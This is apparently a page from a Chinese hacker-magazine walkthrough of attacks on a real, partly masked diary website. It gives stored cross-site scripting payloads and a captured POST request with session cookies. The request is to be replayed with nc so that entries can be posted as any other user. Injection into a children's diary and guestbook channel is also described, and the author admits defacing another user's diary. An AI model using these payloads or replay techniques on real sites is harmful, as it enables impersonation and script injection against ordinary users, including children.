漏洞漫舞的飞骋网站入侵实例(图)

3、曰记本介绍跨站漏洞。 

        在登陆曰记管理后，总是显示一个页面要填写曰记介绍，我们不妨在这里写个跨站代码，这样别人浏览我们的曰记本的时候就会执行了。 

4、随意以任何用户身份添加曰记漏洞。 

        老用UE面对一些枯燥的代码未免有些不爽，于是我又用DreamWeaver打开保存在本地的页面，发现有3个隐藏域，(图三) 



        我们来看下，第一个隐藏域的值就是我们的用户名，这里是不是有文章可做呢，我们以blackcats登陆，把这个文件的隐藏域值改为BlackWoods，然后保存打开，写一些东西并提交，然后便在BlackWoods的曰记本中看到了我们提交的内容!My God!Session是干什么用的？! 

        额外的话：由于我在开始测试网站的漏洞的时候玩的比较凶(在一个JJ的曰记上写了”路过，路过而已”)，结果第二天管理员就加了一个防止外部提交的代码，如果我们在本地修改再打开，提交的话会显示禁止外部提交。(图四) 



        对于禁止外部提交的突破方法黑客X档案以前也是提过的，我这里再说下，我们完成一次合法的曰记提交，并用WinSockExpert抓包，可以得到： 

POST /add_blog.asp? HTTP/1.1 

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* 

Referer: http://diary.fc****.com/add_blog.asp?action=add 

Accept-Language: zh-cn 

Content-Type: application/x-www-form-urlencoded 

Accept-Encoding: gzip, deflate 

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon) 

Host: diary.fc****.com 

Content-Length: 251 

Connection: Keep-Alive 

Cache-Control: no-cache 

Cookie: Logined=d738623c3a97ec40cb0b153fd94ade49; LoginedMd5=e10adc3949ba59abbe56e057f20f883e; LoginId=517609; LoginUserName=blackcats; IsGrade=0; last_time1=1115915788; last_time=2005-05-13+00%3A18%3A48; username=blackcats; use太阳d=517609; ASPSESSIONIDQSBASSBT=FFJHCNEBAJLBMIKJEFFAPCOF; ASPSESSIONIDQQBBRSCS=APNJNNEBMOBNGOGKPJIJMHEI 

title=title&postyear=2005&postmonth=5&postday=13&sfsd=0&password=&blog_leibie=%CE%DE%C0%E0%B4%E6%B4%A2&xinqing=14.gif&weather=sun.gif&font=%CB%CE%CC%E5&size=3&color=%236495ED&Content=content&qiangzhi=0&ok=%CC%E1%BD%BB&username=blackcats&action=add&id= 

这样我们用NC发下包就可以完美的绕过可爱的不验证session的程序而非法跨站或者帮别人写曰记了。 

5、小朋友的曰记就安全吗-少儿频道曰记跨站漏洞。 

        飞骋有个少儿频道，办得不错，其中有个让小朋友写曰记的功能，呵呵，程序员大概觉得小朋友都比较乖，不会跨站，可是…我这个“大朋友”来了，搞的不安全了，我们直接在曰记的内容写〈sc太阳pt〉alert(“玄猫啊玄猫，玄猫要高考咯”)〈/sc太阳pt〉，提交，浏览曰记，发现对话框弹了出来，跨站成功，呵呵，不要吓到小朋友，我们还是把曰记删了吧… 

6、小朋友的留言就安全吗-少儿频道留言跨站漏洞。 

        当我们看了别的小朋友的曰记的时候，总该给他/她留个言鼓励下吧，当打开留言窗口后，我的双眼突然露出邪恶的目光，为了让小朋友注意我们的留言，我们来弹对话框吧：因为留言的标题只能写20个字，写起来很不爽，而且经过玄猫的测试，写入数据库之前程序还判断了标题的字数，所以我们直接在内容里写，最终的结果是跨站成功，由于前面已经讲的很详细了，这里就不再说了。 

        关于网站程序本身的漏洞，暂时就说到这里，这个站点存在的主要问题还是对于跨站防御不足，管理员对程序的逻辑处理有些小小的漏洞，我们再来看它给老用户提供的免费空间的漏洞。 

上一页  [1] [2] [3] 下一页